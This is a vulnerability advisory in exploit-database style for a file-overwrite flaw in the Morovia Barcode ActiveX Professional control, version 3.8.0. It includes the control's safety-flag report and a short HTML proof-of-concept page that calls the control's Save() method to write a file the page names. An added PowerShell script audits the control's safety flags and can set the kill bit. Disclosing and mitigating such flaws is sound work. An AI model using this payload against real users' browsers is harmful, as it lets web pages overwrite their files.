Morovia Barcode ActiveX Professional 3 File Overwrite

2012.07.26
Credit: coolkaveh
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Exploit Title: Morovia Barcode ActiveX Professional 3 File Overwrite Exploit
Date: July 24, 2012
Author: coolkaveh
coolkaveh () rocketmail com
https://twitter.com/coolkaveh
Vendor Homepage: http://www.morovia.com/component/barcode-activex/
Version: 3.8.0
Tested on: Windows 7
awesome coolkaveh
==========================================================================
Class MrvBarcode
GUID: {18B409DA-241A-4BD8-AC69-B5D547D5B141}
Number of Interfaces: 1
Default Interface: IBarcode
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False

Report for Clsid: {18B409DA-241A-4BD8-AC69-B5D547D5B141}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data

Members : 127
BackColor BorderColor BorderStyle BorderWidth ForeColor Comment
CommentMarginLeft CommentMarginRight CommentMarginTop CommentMarginBottom
BarHeight BarWidthReduction message NarrowBarWidth NarrowToWideRatio
SymbolMarginTop SymbolMarginBottom SymbolMarginLeft SymbolMarginRight
LabelHeight LabelWidth ZoomRatio RasterImageResolution FeatureKey
DataMatrixModuleSize Save Load ExportImage
PDFAspectRatio PDFMaxCols PDFMaxRows PDFModuleHeight PDFModuleWidth
PDFPctOverhead PDFSecurityLevel
MaxicodeClass MaxicodeMode MaxicodeCountryCode MaxicodeZipCode
============================================================================
<HTML>
<HEAD>
<title>Morovia Barcode ActiveX </title>
</HEAD>
<BODY>
<!-- Instantiates the MrvBarcode control by CLSID; the button calls its Save() method with a file name chosen by the page -->
<object id=coolkaveh classid="clsid:{18B409DA-241A-4BD8-AC69-B5D547D5B141}"></object>
<SCRIPT>
function go()
{
File = "coolkaveh.txt"
coolkaveh.Save(File)
}
</SCRIPT>
<input language=JavaScript onclick=go() type=button value="Click here To Test"><br>
</body>
</HTML>

References:

http://www.morovia.com/component/barcode-activex/
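
The report above shows the control marked safe for scripting and initialization with no kill bit set. The following PowerShell script is an added example, not part of the original advisory or the vendor's tooling: it audits those same settings for the CLSID in the report and can optionally set the kill bit. The registry locations are the standard Internet Explorer ones and assume the control is registered machine-wide.

```powershell
# Added example: audit and kill-bit mitigation for the MrvBarcode control.
# The CLSID comes from the advisory; the registry paths are the standard
# Internet Explorer locations (assumption: machine-wide registration).
param([switch]$SetKillBit)

$clsid   = '{18B409DA-241A-4BD8-AC69-B5D547D5B141}'
$killBit = 0x400   # "Compatibility Flags" value that stops IE from loading a control
# Component categories a control registers to declare itself "safe".
# A control can also claim safety at run time through IObjectSafety,
# which this registry check does not see.
$catIds = [ordered]@{
    'Safe for scripting'    = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
    'Safe for initializing' = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'
}
# Native and 32-bit (WOW64) registry views; 32-bit IE on x64 reads the second one
$roots = 'HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\Wow6432Node'

foreach ($root in $roots) {
    if (-not (Test-Path $root)) { continue }
    $classKey  = "$root\Classes\CLSID\$clsid"
    $compatKey = "$root\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"

    Write-Output "[$root] control registered: $(Test-Path $classKey)"
    foreach ($name in $catIds.Keys) {
        $marked = Test-Path "$classKey\Implemented Categories\$($catIds[$name])"
        Write-Output "  ${name}: $marked"
    }

    # Read the current flags, treating a missing key or value as 0
    $flags = 0
    if (Test-Path $compatKey) {
        $prop = Get-ItemProperty -Path $compatKey -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($prop) { $flags = [int]$prop.'Compatibility Flags' }
    }
    $killed = ($flags -band $killBit) -ne 0
    Write-Output "  Kill bit set: $killed"

    if ($SetKillBit -and -not $killed) {
        # Needs an elevated session; other compatibility flags are preserved
        if (-not (Test-Path $compatKey)) { New-Item -Path $compatKey -Force | Out-Null }
        Set-ItemProperty -Path $compatKey -Name 'Compatibility Flags' -Value ($flags -bor $killBit) -Type DWord
        Write-Output "  Kill bit written to $compatKey"
    }
}
```

Run without arguments to audit only; pass -SetKillBit from an elevated session to apply the mitigation. The kill bit only prevents loading in Internet Explorer and other hosts that honor it, so desktop applications that embed the control directly are unaffected.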

